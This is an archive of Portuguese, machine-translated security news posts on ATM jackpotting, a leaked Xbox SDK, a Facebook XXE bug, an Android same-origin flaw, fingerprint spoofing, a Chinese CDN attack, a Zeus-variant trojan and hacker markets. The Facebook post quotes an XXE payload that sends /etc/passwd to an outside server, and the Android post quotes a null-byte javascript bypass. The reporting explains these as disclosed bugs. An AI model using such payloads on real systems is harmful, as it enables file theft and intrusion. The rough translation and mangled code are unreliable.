quinta-feira, 8 de janeiro de 2015

Hackers roubam caixa eletrônico usando smartphone


Hackers invadiram os sistemas ATM forçando-os a distribuir o dinheiro armazenado em suas caixas de dinheiro contando com certos comandos enviados por meio de um smartphone.

Os cibercriminosos podem hackear ATM sistemas e forçá-lo a dispensar o dinheiro usando um smartphone, no caso específico de um Samsung Galaxy 4 telefone.

O modelo de smartphone não é importante, os dispositivos móveis são usados ​​apenas para enviar comandos para o ATM  remotamente uma vez que o atacante tenha fisicamente conectado a máquina.

Mal ATMs protegidos resultado mais expostos a este tipo de atacante, hackers comprometer o seu caso, a fim de conectar o dispositivo móvel.

O especialista em segurança Brian Krebs publicou um interessante post intitulado " Ladrões ATMs jackpot com Attack 'caixa preta' "para descrever este tipo de ataques que pertencem a" uma nova classe de scams desnatação destinadas a retirar depósitos em ATM ".

A "caixa preta" ataque ATM descrito por Brian Krebs contou com um smartphone e uma placa de circuito baseado em USB.

"A questão é uma forma de fraude ATM conhecido como uma" caixa preta "de ataque. Em uma caixa de assalto preto, os bandidos ganham acesso físico a parte superior da máquina de dinheiro. A partir daí, os atacantes são capazes de desligar terminal da ATM do "core" (o computador e cérebro do dispositivo), e em seguida, conecte o seu próprio computador que pode ser usado para emitir comandos forçando o dispenser de cuspir fora o dinheiro. " estados de Krebs.

Caixa de ataque preto ATM
Retomando, as tripulações criminais isolar o terminal do PC ATM e conectá-lo um PC eles controlam usando o smartphone. Krebs informou que os "ataques caixa preta", foram realizados contra ATMs feitas pelo vendedor NCR.

"NCR diz que os bandidos então anexado um telefone inteligente (uma virgem, out-of-the-box Samsung Galaxy 4), que eles usaram como um canal através do qual para enviar comandos para o terminal remotamente. Segundo Harrow, o telefone móvel foi criado para transmitir comandos através de um serviço de IP dinâmico. ", Disse Krebs.

Em um caso, o atacante usou uma placa de circuito com conexão USB para ligá-lo ao controlador de ATM, a fim de enganar o computador em acreditar que ainda estava ligado ao terminal. Krebs destacou que de qualquer forma o circuito suplementar era desnecessário para a "caixa preta" ataque ATM.

"Eles ligado ao controlador de uma placa de circuito baseado em USB que NCR acredita que foi projetado para enganar o núcleo da ATM em pensar que ainda estava ligado ao terminal.", Diz o post.

Não é a primeira vez que ATMs da NCR têm sido alvo de hackers, no passado discutimos uma outra técnica de ataque que se baseia em um malware injetado através de um CD-ROM inserido o núcleo ATM.

Em outubro de 2014, gangues criminosas na Europa de Leste realizou vários ataques contra caixas eletrônicos, não só adulteração-los com skimmers cartão  que roubam dados de cartões de débito, mas também usando malware.

O código malicioso usado por criminosos virtuais permite que hackers para roubar dinheiro do caixa eletrônico sem o uso de  cartões de crédito clonados . A Interpol realizou uma operação conjunta com os especialistas da Kaspersky Lab, o que lhes permitiu detectar a malwares Tyupkin  em cerca de 50 máquinas. Como explicou em um post no blog sobre SecureList , apresentações Tyupkin para Virus Total  eram principalmente da Rússia (20), mas outras amostras (4) foram relatados também dos Estados Unidos, Índia e China.

No momento, os pesquisadores da NCR foi informado apenas cerca de dois ataques de caixa preta, por esta razão, a empresa emitiu uma atualização de firmware para sua máquina que melhorar a criptografia para a comunicação entre o terminal e o núcleo do sistema. A atualização também inclui um recurso que bloqueia a possibilidade de roll-back a versão do firmware, o rebaixamento poderia ser explorada por hackers para fazer a ATM vulnerável novamente.

"A empresa também enviado recentemente uma atualização de software para seus ATMs que fortaleçam a criptografia usada para gerenciar a comunicação entre o terminal e o núcleo ATM. Mais importante ainda, a actualização altera o sistema de modo a que a troca de chaves de criptografia entre esses dois componentes é feito somente quando o distribuidor recebe uma sequência de autenticação específica. "

Os especialistas da NCR confirmou que este tipo de ataque é muito fácil de organizar e são muito baratos.

"Todas as coisas consideradas, este é um ataque muito barato", disse Charlie Harrow, gerente de soluções para a segurança global da NCR. "Se você sabe que comanda o direito de enviar, é relativamente simples de fazer. É por isso que melhor autenticação precisa estar lá ",

Outra modificação incluída na atualização refere-se a bloquear a possibilidade de roll-back a versão do firmware para que a máquina se torna vulnerável novamente.

Pierluigi Paganini

( Assuntos de Segurança  -   ATM, o cibercrime )

terça-feira, 6 de janeiro de 2015

Salários de profissionais de TI 2015

http://info.abril.com.br/noticias/carreira/fotonoticias/veja-a-media-salarial-dos-profissionais-de-ti-para-2015-1.shtml

domingo, 4 de janeiro de 2015

Vazou o developer kit do xbox

Menu

Assuntos de Segurança
Leia, pense, parte ... Segurança é responsabilidade de todos
Hacking H4LT equipe vazou Xbox One SDK on-line

Fb-Button

O H4LT equipe de hackers vazou Xbox One SDK on-line que poderia deixá-especialistas para desenvolver seus próprios aplicativos homebrew e executá-los no console do jogo popular.

A indústria de jogos está em tempestade completo após a queda maciça  de PSN e Xbox Live no Natal causada pelo Lizard Esquadrão . Desta vez é o vazamento on-line do kit de desenvolvimento de software (SDK) para o Xbox Live a preocupar os especialistas da indústria do jogo. O SDK está circulando graças a um grupo que se autodenomina H4LT, a disponibilidade do Microsoft Xbox Um desenvolvedor SDK  abre a porta para aplicações caseiras, isso significa que os desenvolvedores não aprovados serão capazes de desenvolver software não oficial e os especialistas acreditam que eles serão capazes de projetar também rachadura específico para o console popular.

xbox sdk vazamento

O grupo H4LT anunciou o Xbox Um vazamento por meio de sua conta oficial no Twitter, o pacote foi hospedado na plataforma Mega.co.nz. compartilhamento de arquivos O grupo H4LT sustenta que vazou na internet o Xbox SDK para melhorar o crescimento da comunidade em torno da consola de jogos popular.
Os hackers desde que os screenshots do lançamento do Novembro do XDK Durango (Xbox Development Kit) arquivos, incluindo o firmware do dispositivo e sua documentação e uma coleção de ferramentas de desenvolvimento.
Hey, Xbox ! Nós pensamos em cair sobre perto e terminar 2014 com um estrondo https://t.co/dQH9CIPrb0 - areWeH4LT (notHALT) 30 Dicembre 2014;)

TechGame conseguiu entrar em contato com o grupo que forneceu a seguinte explicação para o Kit Xbox Development:

" Nós vazou para a comunidade porque se algo é compartilhado então .. progresso é alcançado mais rápido do que sozinho. Algo mantido entre nós não vai conseguir nada. Compartilhe com a comunidade = criatividade e pesquisa. Shared é assim que deve ser. O SDK será, basicamente, permitir que a comunidade de reverter e abrir as portas para as aplicações homebrew estar presente no Xbox One. "

O grupo H4LT qualquer maneira explicou que não tem nenhuma ligação com o Lizard Plantel  e seus membros.

"Você se divertiu por derrubar servidores. Podemos ter diversão para vazamentos * tosse * dando isso? "É o conteúdo de uma weet enviado por H4LT para Lizard Squad.

Apesar de não haver um funcionário explorar para rodar aplicativos homebrew no console é fácil prever que alguém será capaz de fazê-lo em um futuro próximo.

" Uma vez que o SDK está fora, as pessoas que tenham conhecimento ou, no passado, inverteu os arquivos relacionados ao (8) do sistema operacional Windows deve definitivamente ter um ir para reverter alguns arquivos lá, "acrescentou o grupo. " Por quê? Bem, o Xbox One é praticamente um despojado Windows 8 dispositivo e introduziu um novo formato de pacote que não teve muita atenção. Este formato é responsável por atualizar o console e armazenamento de aplicativos (jogos são na categoria de "Aplicativos" no Xbox One) e é uma modificação de discos rígidos virtuais. "

Fique ligado para mais informações ... ter certeza de que os especialistas já estão analisando o código. ... Certifique-se de que os especialistas já estão analisando o código.

Pierluigi Paganini

( Assuntos de Segurança  - Xbox One SDK, consola de jogos)

Compartilhe por favor ...Tweet sobre isso no TwitterPartilhar no Google+Partilhar no FacebookPartilhar no LinkedInPin no PinterestCompartilhar no RedditMande para alguémPartilhar no StumbleUpon
Compartilhe isso:
EmailChilroImpressãoLinkedIn 49Facebook 31Mais
03 de janeiro de 2015
«Anterior
Ver site completo
Powered by WordPress

sexta-feira, 2 de janeiro de 2015

Mais uma vulnerabilidade do Facebook

Um especialista em segurança descobriu uma vulnerabilidade no Facebook que permite realizar várias atividades maliciosas apenas o upload de um arquivo do Microsoft Word forjado.

O pesquisador de segurança Mohamed Ramadan descobriu uma vulnerabilidade crítica no Facebook que permite que um atacante para hackear conta dos usuários usando um arquivo do Microsoft Word .docx forjado. Ramadan não é novidade para esse tipo de descobertas, ele já encontrou nos últimos vulnerabilidades em serviços web fornecidos pelo Facebook, Google, Microsoft e Twitter.
Ramadan estava realizando um reconhecimento do serviço Facebook quando ele veio na página carreira de Facebook , geralmente esse tipo de página permite que os usuários enviem seu CV através de um componente de upload. O especialista enviado com sucesso o seu CV para a plataforma Facebook. O uploader de Facebook permite apenas arquivos nos formatos PDF ou .docx, então ele teve a idéia de explorar o arquivo .docx, um formato concebido pela Microsoft, que, basicamente, pode ser equiparado a um  arquivo xml zipado.   Neste ponto, ele criou um falso CV com forjado documento do Microsoft Word e enviados para a página web carreiras Facebook. Abaixo um trecho de código incluído no arquivo XML que ele escreveu.
DOCTYPE root [
<! ENTITY% "file: /// etc / passwd" sistema de arquivos>
SISTEMA dtd "http://197.37.102.90/ext.dtd">
% DTD;
Send%;
]]>
Ele começou um servidor HTTP em execução em Python em sua máquina local e ele criou um arquivo chamado ext.dtd no diretório mohaab007. Este é o conteúdo recuperado de ext.dtd:
<! ENTITY% todos
"X25; enviar SYSTEM 'http://197.37.102.90/FACEBOOK-HACKED?%25file; ">"
>
% Todos;
Depois de carregar a Palavra CV forjou o pesquisador esperou pela resposta Facebook.
"Agora tudo é bom e em seguida foram enviados para CV.docx https://www.facebook.com/careers/  e esperou um minuto, mas não aconteceu nada. Eu disse a mim mesmo que é um fracasso total e eu vou verificar o meu perfil no Facebook, em vez e conversar com alguns amigos e jogar um jogo ou algo assim depois deste longo  FALHOU tentativa. Perdi cerca de 15 minutos ou conversando e navegando agora é hora de parar o servidor http python e perto Facebook e tudo mais. Eu estava indo para fechar minha janela do terminal e fiquei chocado ao ver que algo ligado ao meu servidor http python ", afirmou em um post de blog .
facebook hackeado docx-XXe
O resultado é surpreendente, Ramadan forçou um servidor do Facebook para se conectar ao seu servidor HTTP Python, uma circunstância que abrir as portas para vários cenários de ataque como explica o especialista.
  • DoS o sistema de análise, tornando-o aberto, egfile: /// dev / random | file: /// dev / urandom | file: // c: / con / con
  •  TCP verifica usando entidades externas HTTP (incluindo firewalls desde servidores de aplicações, muitas vezes têm visão de mundo diferente daquele do atacante)
  • O acesso não autorizado aos dados armazenados como arquivos XML no sistema de arquivos do sistema de análise (claro que o atacante ainda precisa de uma forma de obter esses dados de volta)
  • DoS em outros sistemas (se o sistema de análise é permitido estabelecer conexões TCP para outros sistemas)
  •  Roubo de material de autenticação NTLM, iniciando o acesso ao arquivo UNC para sistemas sob controle atacante (muito buscado?)
  • Cenário apocalíptico: Um aplicativo amplamente utilizada e altamente conectado vulneráveis ​​a este ataque pode ser usado para DDoS .
  • Listagem de diretórios, Leia sistema e arquivos do aplicativo e, em alguns casos, executar comandos do sistema usando php esperar: //: // wrapper.
O perito tentou aceder ao Facebook sistema de arquivos do servidor, mas não conseguiu provavelmente devido a mecanismos de segurança a empresa implementou. O especialista de qualquer maneira estava confiante de que o ataque ele reproduziu era cego XXE (XML Entidade Externa) fora de banda (OOB) e notei também que foi um processo demorado, porque ele precisava para fazer o upload e esperar o resultado depois de mais de 15 minutos. Ramadan eticamente relatou suas descobertas para Facebook que foram rejeitadas pela primeira vez.
facebook reply-XXe-1

Como mais uma prova de sua corte, ele também forneceu o CV forjado usado para forçar o servidor Facebook para manter contato com a sua máquina, mas ele recebeu outra resposta negativa:
facebook reply-XXe-2
Ele forneceu outros detalhes sobre seu teste para a equipe de segurança do Facebook, que em última análise percebeu a existência de uma vulnerabilidade grave no seu uploader de arquivos e recompensado Ramadan por sua descoberta.
facebook reply-XXe-3

Facebook fixa a vulnerabilidade no mecanismo de upload, adicionando esta linha de código:
"  libxml_disable_entity_loader (true) "

terça-feira, 30 de dezembro de 2014

Navegador nativo do Android tem vulnerabilidade

A vulnerabilidade de segurança grave afeta o navegador padrão do sistema operacional Android inferior a 4,4, de acordo com os dados fornecidos pelo Google dashboard oficial quase a 66% dos dispositivos Android é impactado. A falha de segurança permite que um atacante para ignorar a política de mesma origem (SOP).

Android mesma falha Política de Origem

O Android política de mesma origem (SOP) vulnerabilidade ( CVE-2.014-6.041 ) foi divulgado pela primeira vez em setembro 2014 pelo especialista em segurança Rafay Baloch, que percebeu que o AOSP (Android plataforma open source) navegador instalado no Android 4.2.1 era vulnerável a política de mesma origem (SOP) vulnerabilidade que permite que um site para roubar dados de outro.

"O Navegador Android 4.2.1 aplicação no Android permite que atacantes remotos para ignorar a Política de Origem Same via um atributo trabalhada contendo um personagem \ u0000, como demonstrado por um onclick =" window.open ('\ u0000javascript:. Sequência ", afirma a descrição do  CVE-2014-6041  vulnerabilidade .

De acordo com especialistas em segurança da Trend Micro e Facebook, muitos usuários da rede social popular têm sido alvo de ataques cibernéticos que tentam explorar a Política de Origem (SOP) vulnerabilidade Same. Os atacantes usaram um Metasploit código de exploração publicamente disponível para executar o ataque de uma forma fácil e automatizado.

"Alguns meses atrás, nós discutimos a mesma vulnerabilidade Android Política de Origem (SOP), que foi mais tarde encontrado para ter um maior alcance do que se pensava. Agora, sob a colaboração da Trend Micro e Facebook, os ataques são encontrados que ativamente tentativa de explorar esta vulnerabilidade particular, cujo código acreditamos foi baseada na disposição do público código Metasploit. ", Afirma um post publicado pela TrendMicro.

Devido ao enorme impacto da Política de Origem (SOP) vulnerabilidade Same, o especialista Tod Beardsley apelidou-o " desastre de privacidade ". Beardsley é um dos desenvolvedores para  o  Metasploit equipe e forneceu um POC-vídeo para demonstrar que a falha é " suficientemente chocante . "

"Ao malforming um javascript: URL manipulador com um byte prefixado nulo, o AOSP, ou Android plataforma de código aberto (AOSP) Browser) não cumprir a Política (SOP) de controle de segurança do navegador de mesma origem ", Tod Beardsley da Rapid7 escreveu em um post . " O que isto significa é, qualquer site arbitrária (digamos, uma controlada por um spammer ou um espião) pode espreitar o conteúdo de qualquer outra página web. Imagine que você foi a uma atacantes site enquanto você teve seu webmail aberto em outra janela - o atacante poderia raspar seus dados de e-mail e ver o que o seu navegador vê. Pior, ele poderia prender uma cópia do seu cookie de sessão e seqüestrar sua sessão completamente, e ler e escrever webmail em seu nome.  Isso é um desastre de privacidade. A mesma origem política é a pedra angular da privacidade na web, e é um conjunto de componentes críticos para a segurança do navegador web. Oh, e fica pior. "

A política de mesma origem é um fundamental no modelo de segurança de aplicativos web implementados para proteger experiência de navegação dos usuários.

"Os scripts de política permite correr em páginas de originários do mesmo local - uma combinação de regime, hostname, eo número da porta -. Acessar DOM do outro, sem restrições específicas, mas impede o acesso ao DOM em locais diferentes", lê Wikipedia.

De acordo com a Trend Micro os atacantes servido um link através de uma página no Facebook em particular que redirecionar os usuários do Facebook para um site malicioso.

"Este ataque tem como alvo usuários do Facebook através de um link em uma página no Facebook em particular que leva a um site malicioso. Esta página contém ofuscado JavaScript código, que inclui uma tentativa de carregar a URL Facebook em um quadro interno. O usuário só verá uma página em branco como HTML da página foi configurado para não exibir qualquer coisa através da sua tag div, enquanto o quadro interno tem um tamanho de um pixel. ", Continua o post.

Android mesma falha Política de Origem Facebook

O código JavaScript pode ser explorada por um atacante para realizar várias atividades por conta Facebook da vítima, incluindo:

Adicionando Amigos
Como e Siga qualquer página do Facebook
Modificar Assinaturas
Autorizar aplicativos do Facebook para acessar o perfil público do usuário, lista de amigos, informações de aniversário, gosta.
Para roubar tokens de acesso da vítima e enviá-los para o seu servidor.
Coletar dados de análise (como a localização das vítimas, referenciador HTTP, etc.) usando o serviço legítimo.
Os especialistas notaram que os criminosos por trás desses ataques contar com um aplicativo BlackBerry oficial mantido pelo BlackBerry, a fim de roubar os tokens de acesso usadas para cortar as contas do Facebook.

"O malware móvel usando o SOP Android Exploit (Android Same Origin Policy Bypass Exploit) é projetado para atacar usuários do Facebook, independentemente da sua plataforma de dispositivos móveis", disse Blackberry Trend Micro em um comunicado. "No entanto, ele tenta tirar vantagem do site BlackBerry marca usando nosso aplicativo web Facebook. BlackBerry trabalha continuamente com a Trend Micro e Facebook para detectar e mitigar esse ataque. Note-se que o problema não é o resultado de um exploit para hardware, software, ou rede de Blackberry ".

Para corrigir a mesma vulnerabilidade Política Origin é necessário aplicar um patch já está disponível e emitido pela Google em setembro. Infelizmente, milhões de dispositivos Android ainda são vulneráveis ​​porque os fabricantes já não empurrar a atualização para seus clientes. A fim de proteger-se, desativar o navegador a partir de seus dispositivos Android, vá para Configurações> Aplicativos> Todos e procurando seu ícone.

Pierluigi Paganini

( Assuntos de Segurança  - política de mesma origem Vulnerabilidade, Android)

Biometria sem dedo vivo não é segura.


Um especialista em segurança na conferência do Chaos Computer Club mostrou como contornar biometria da impressão digital utilizando apenas algumas fotografias.

Biometria da impressão digital são considerados por muitos especialistas em segurança, um dos mais sofisticados sistemas de autenticação que combina segurança e facilidade de uso. Gigante de TI, como Apple e Samsung estão olhando com grande interesse para os dados biométricos de impressão digital, as duas empresas implementar a autenticação biométrica para as várias funções disponíveis no seu smartphone.

É biometria da impressão digital totalmente segura?

O pesquisador alemão Jan Krissler, aka Starbug, demonstrado pelo Chaos Computer Club da Alemanha, que também biometria da impressão digital poderia ser cortado.

O especialista afirma ter "copiado" a impressão digital da Alemanha ministro da Defesa, Ursula von der Leyen a partir de fotos padrão, ele usou uma imagem de close-up do ministro e isso combinado com outras fotografias para compor a impressão final, usando o software de biometria chamado Algoritmo.

Biometria da impressão digital 3

No passado, outros especialistas têm violado os dados biométricos de impressão digital Usando cópias obtidas a partir de uma pessoa que tocou fisicamente um objeto com uma superfície polida (ou seja, de vidro).

"Hackers membros da reivindicação Chaos Computer Club ter derrotado sensor de impressão digital da Apple TouchID para o iPhone 5S, logo após o início da sua venda ao público. O Chaos Computer Club na Alemanha anunciou na tarde de sábado ter ultrapassado com sucesso a segurança biométrica no sensor de impressão digital touch ID da Apple pelo uso de materiais que podem ser encontrados em quase todos os lares, parece que eles fizeram isso fotografando a impressão digital de um usuário do iPhone a partir de um vidro superfície e usar essa imagem capturada para verificar as credenciais de login do usuário. "Eu escrevi em um posto em setembro de 2013.

Em abril de 2014,  SRLabs  pesquisadores publicaram um vídeo Proof of Concept no YouTube para demonstrar que eles foram capazes de ignorar o mecanismo de autenticação de impressão digital implementado pela Samsung Galaxy S5 . Os pesquisadores demonstraram obter acesso não autorizado apenas usando uma impressão digital levantou com madeira-cola dedo fictício baseado.

Desta vez Krissler mostrou como estes, é possível alcançar o mesmo objetivo usando uma "câmera de fotos padrão."

" Krissler disse que usou um software disponível comercialmente chamado VeriFinger para retirar a façanha. A principal fonte era um retrato close-up de ouro von der Leyen do obtido durante uma coletiva de imprensa em outubro, junto com fotografias tiradas a partir de ângulos diferentes para obter uma imagem completa da impressão digital. ", relatou uma pós em venturebeat.com.

Starbug acredita que, após a sua apresentação "os políticos vão presumivelmente usar luvas quando se fala em público", e provavelmente ele está certo ;-)

Biometria da impressão digital é ainda considerável seguro, de qualquer maneira, é mais seguro de muitos outros métodos de autenticação.

"O site comenta:" Mesmo se reproduzindo uma impressão digital era um método viável para invadir um sistema, seja ele um smartphone ou um cofre de alta segurança, esta notícia não significa que as impressões digitais são repente inútil. Medidas de segurança perfeitas não existem, e as impressões digitais definitivamente ainda têm o seu lugar. ", Continua o VentureBeat.

Pierluigi Paganini

( Assuntos de Segurança  - Autenticação, biometria da impressão

sábado, 27 de dezembro de 2014

Hackers chineses derrubam rede do Afeganistão

Hackers chineses derrubaram todos os principais sites do governo do Afeganistão por hackear uma rede CDN oficial usada no país.

Os especialistas da  Equipa de Investigação de Inteligência ThreatConnect (TCIRT ) informou recentemente a operação, batizada de Operação Helmand, dirigido por um grupo de hackers chineses que atacou toda a rede web governo afegão. Os hackers supostamente usado um cross-site scripting alvo (XSS) "drive-by" ataque sobre o conteúdo principal Delivery Network (CDN) usado no Afeganistão.

As plataformas CDN são um componente essencial para publicação na web, elas permitem a entregar dinamicamente o conteúdo da web para entidades públicas e privadas. Comprometer a CDN é possível atingir um público amplo, por esta razão, eles representam um alvo privilegiado para os atores de ameaça.

Um invasor pode explorar a plataforma CDN por exemplo, para servir de conteúdo malicioso e sistemas de compromisso visitante '.

No caso específico, os atacantes executar um cross-site scripting alvo (XSS) "drive-by" ataque que alavancou um único CDN para espalhar um applet Java malicioso através dos principais sites Afeganistão.

A campanha de hackers supostamente bater a rede gerenciada pelo afegão Ministério das Comunicações e TI (MCIT), os atacantes usaram um JavaScript para comprometida a CDN disponível no seguinte URL:  [http:] [.] // cdn.afghanistan af / scripts / GOP-script.js

"O domínio CDN .afghanistan [.] af é um site CDN legítimo utilizado pelo Ministério afegão das Comunicações e TI (MCIT) para hospedar o conteúdo da web que é exibido e usado em muitos sites oficiais gov.af. "Reportes um post publicado pelo ThreatConnect.com.

CDN Afeganistão pirataria

Os hackers derrubaram os sites dos principais órgãos do governo afegão, incluindo Educação, Finanças, Negócios Estrangeiros, Justiça e Assuntos da Mulher, e sites estrangeiros que recebem conteúdo do mesmo CDN como a embaixada australiana. Abaixo a lista de sites afetados:

[Http:] [.] // Canberra.afghanistan af / en (afegão Embaixada em Canberra, Austrália)
[Http:] [.] // Herat.gov af / fa (província de Herat Governo Regional)
[Http:] [.] // Mfa.gov af / en (Ministério dos Negócios Estrangeiros)
[Http:] [.] // Moci.gov af / en (Ministério de Comércio e Indústrias)
[Http:] [.] // Moe.gov af / en (Ministério da Educação)
[Http:] [.] // Mof.gov af / en (Ministério das Finanças)
[Http:] [.] // Moj.gov af / fa (Ministério da Justiça)
[Http:] [.] // Mowa.gov af / fa (Ministério de Assuntos da Mulher)
[Http:] [.] // Oaacoms.gov af / fa (Escritório de Assuntos Administrativos e Conselho de Ministros)
Os especialistas especulam que a Inteligência chinês adotou uma técnica de boteco, porque ele está olhando com grande interesse para o Afeganistão após os EUA ea NATO têm reduzido as suas tropas no país.

"Como os EUA ea NATO reduzir os seus níveis de tropas no Afeganistão, a China está fazendo pose para preencher a lacuna de influência que o oeste está deixando para trás. Com planos para facilitar as negociações de paz multilaterais com o Talibã e estabelecer grandes projetos de transporte que visam fortalecer a economia afegã, Pequim tem sido de olho Afeganistão, como parte de sua estratégia mais ampla do sul da Ásia. "Continua o post.

Os pesquisadores coletaram evidências de que os ataques boteco coincidiu com uma reunião sobre o desenvolvimento das infra-estruturas e da cooperação bilateral no Cazaquistão entre o primeiro-ministro da China Li Keqiang e do governo executivo-chefe do Afeganistão Abdullah Abdullah.

Os pesquisadores, analisando os metadados EXIF ​​da imagem de reunião Keqiang, descobriu que a imagem usada para servir o malware foi modificado algumas horas depois que apareceu a ser tomada na reunião.

CDN Afeganistão hackers 2

A Operação Helmand é bastante semelhante a outros ataques observados no Sudeste Asiático, os especialistas notaram também muitas semelhanças com outro ataque boteco descoberto neste verão, quando um arquivo Java malicioso foi servido no site da embaixada Grécia em Pequim durante uma reunião diplomática a Atenas.

Pierluigi Paganini

( Assuntos de Segurança  - Operação Helmand, CDN, Afeganistão)

segunda-feira, 22 de dezembro de 2014

Novo trojan ataca 150 bancos


A nova estirpe de Zeus Trojan apelidado Chthonic foi descoberto na natureza segmentação mais de 150 bancos e 20 sistemas de pagamento, principalmente na Europa.

Especialistas acreditam que eles viram tudo sobre o trojan Zeus , P2P versões, versões que infectam SaaS , agentes que exploram a rede Tor ou que mulas de dinheiro recruta ... então prontamente uma nova estirpe do malware em regiões selvagens e surpreende todos.

A nova variante Zeus é apelidado Chthonic e depende de um novo mecanismo para carregar seus módulos. A nova cepa de máquinas infectadas de malware prevalentemente no Reino Unido, Espanha, EUA, Rússia e Japão. Outras infecções também foram relatados em outros países europeus, incluindo a Bulgária, Irlanda, França, Alemanha e Itália.

Chthonic 3

Chthonic é servido às vítimas através do bot Andromeda, bem como através de um exploit para uma vulnerabilidade no Microsoft Office ( CVE-2014-1761 ) que é distribuído via e-mail.

"Uma nova ameaça de malware significativa segmentação sistemas bancários online e seus clientes tem sido detectado por analistas de segurança da Kaspersky Lab. Identificada como uma evolução do infame ZeuS Trojan, Trojan-Banker.Win32.Chthonic, ou Chthonic para breve, é conhecido por ter atingido mais de 150 bancos e 20 diferentes sistemas de pagamento em 15 países. Parece ser direcionados principalmente para as instituições financeiras no Reino Unido, a Espanha, os EUA, Rússia, Japão e Itália. ", Afirma um post publicado pela Kaspersky Lab.

O especialista descobriu que muitos componentes da Chthonic são compatíveis com sistemas de 64 bits, ele combina o esquema de criptografia de outras cepas de Zeus, bem como uma máquina virtual implementada por ZeusVM e KINS trojan .

"Chthonic compartilha algumas semelhanças com outros Trojans. Ele usa a mesma encryptor e downloader como bots Andrômeda, o mesmo esquema de criptografia AES como Zeus e Zeus Trojan V2, e uma máquina virtual semelhante ao utilizado em ZeusVM e KINS malware. ", Continua o post.

Chthonic usa um módulo principal que baixar todos os outros módulos do malware, o agente trabalha com plataformas de 32-bit e 64-bit, e entre as suas capacidades não está coletando informações do sistema, roubar senhas do sistema através Pony malwares , keyloggers, web controle de câmera, forma grilagem, injeção web e acesso remoto através de VNC componente de desktop remoto.

Chthonic 2

Os especialistas destacaram os injetores de Chthonic web que permitem que o malware para inserir seu próprio código no navegador quando vítimas visite o site dos bancos visados.

"Chthonic explora as funções do computador, incluindo a câmara web e teclado para roubar credenciais bancárias on-line, tais como senhas salvas. Os invasores também pode se conectar ao computador remotamente e comandá-lo a realizar as operações. ", Afirma o relatório.

"Principal arma do Chthonic, no entanto, é injetores web. Estes permitem o cavalo de Tróia para inserir seu próprio código e imagens nas páginas bancárias carregados pelo navegador do computador, permitindo que os atacantes para obter o número da vítima telefone, senhas de uso único e PINs, bem como quaisquer login e senha detalhes inseridos pelo usuário . "

O esquema de ataque não é diferente daquele implementado com outra estirpe de Zeus, ele conta com o man-in-the-middle técnica que permite Chthonic para i ntercept comunicação do cliente para o banco alvo e modifica a página web carregado na navegador injectar o código necessário. A injeção de código permite que atacantes para roubar informações bancárias (log-in detalhes, PIN, senha de uso único).

Pelo menos em um ataque contra um banco japonês, Chthonic foi capaz de esconder os avisos do banco, os clientes afetados, entretanto, de bancos russos foram enganados usando um iframe com uma cópia phishing do site que tem o mesmo tamanho da janela original.

"Felizmente, muitos fragmentos de código utilizados por Chthonic para realizar injeções web não pode mais ser usado, porque os bancos mudaram a estrutura de suas páginas e, em alguns casos, os domínios também."

A descoberta de Chthonic trojan é a demonstração de que o Trojan ZeuS ainda está evoluindo, graças também à disponibilidade de seu código-fonte no subterrâneo de hacking .

"" A descoberta de Chthonic confirma que o Trojan ZeuS ainda está evoluindo de forma activa. Os criadores de malware estão a fazer pleno uso das técnicas mais recentes, ajudaram consideravelmente pelo vazamento do código fonte do ZeuS. "

Uma análise detalhada do malware está disponível no website SecureList .

Pierluigi Paganini

( Assuntos de Segurança  - Chthonic, Zeus Trojan Bancário)

domingo, 21 de dezembro de 2014

Perfil do submundo Hacker

O acompanhamento dos mercados de chapéu preto Blackhat uma das principais atividades de especialistas em segurança e agências de inteligência, permite a coleta de informações sobre a evolução das ameaças cibernéticas e as tendências emergentes no ecossistema criminal.

Em 2013, os especialistas da Dell unidade segura Threat Works Counter (CTU) publicou um relatório muito interessante intitulado " The Hacking Underground Economy está vivo e bem. ", que investigou o mercado online para dados roubados e serviços de hacking. O relatório detalhou os produtos vendidos nos mercados negros e custos relacionados, dando aos leitores um retrato interessante do  submundo do crime .

O submundo do crime é caracterizado por uma dinâmica rápida e uma análise cuidadosa pode permitir a aplicação da lei e agência de segurança para entender a evolução das ameaças cibernéticas e as TTPs de operadores principais. Um ano mais tarde, a mesma equipe de especialistas da Dell SecureWorks lançou uma atualização para o estudo dos mercados de chapéu preto, intitulado " Mercados Hacker Subterrâneas ", que relata uma série de tendências dignas de nota.

O pesquisador notou um crescente interesse nos dados pessoais, nomeadamente, em qualquer tipo de documentação que poderia ser usado como uma segunda forma de autenticação, incluindo passaportes, carteiras de motorista, números de segurança social e até mesmo contas de serviços públicos.

"Os mercados estão crescendo com documentos falsificados, para permitir uma fraude, incluindo novos kits de identidade, passaportes, contas de serviços públicos, segurança social cartões e carteiras de motorista. ", afirma o relatório.

Outro elemento distintivo da evolução dos mercados subterrâneos no último ano é a oferta de Hacker Tutoriais.

Tutoriais de treinamento fornecer instrução aos criminosos que querem vender cartões de crédito roubados para outras equipes, ou obter informações detalhadas sobre a execução de explorar kits, no arranjo de spam e campanhas de phishing ou como executar ataques DDoS.

"Estes cursos não só explicar o que, um kit de Tróia de acesso remoto (RAT) e explorar Crypter é, mas também como eles são usados, que são os mais populares, e que os hackers devem pagar por essas ferramentas de hackers", disse o relatório.

Outros tutoriais incluem instruções para fazer um corte ATM , como fazer transferências bancárias sem ser detectado e fazer uma retirada de dados de cartões de crédito roubados.

tutoriais hackers subterrâneas

Os dados fornecidos pela Dell confirma as conclusões de um outro relatório emitido pela TrendMicro que notei no underground brasileiro uma disponibilidade significativa de produtos e serviços similares.

Tripulações Criminal especializada em vender seu negócio de cartões de crédito prêmio, uma conseqüência direta do grande número de violações de dados ocorreram este ano e que inundou os mercados de hacking subterrâneas com milhões de dados de crédito e débito roubados.

Os pesquisadores explicaram marketplaces preto, exatamente como qualquer outro mercado, recompensar a confiabilidade e reputação dos fornecedores líderes que dedicam tanta atenção ao atendimento ao cliente.

Em particular, os criminosos cibernéticos estão se diferenciando a sua oferta com base nos níveis de serviço prestados aos compradores e garantias sobre os dados roubados.

"É evidente que os hackers subterrâneas são monetizar cada pedaço de dados que eles podem roubar ou comprar e estão constantemente adicionando serviços para outros scammers podem realizar com sucesso on-line e em pessoa fraude", é relatada no relatório.

Para aqueles criminosos que desejam adquirir uma nova identidade para atividades ilegais, os pacotes de subterrâneos de identidade de oferta de mercado que incluem passaportes, carteiras de motorista e cartões de segurança social, praticamente qualquer coisa é necessário para cometer um roubo de identidade .

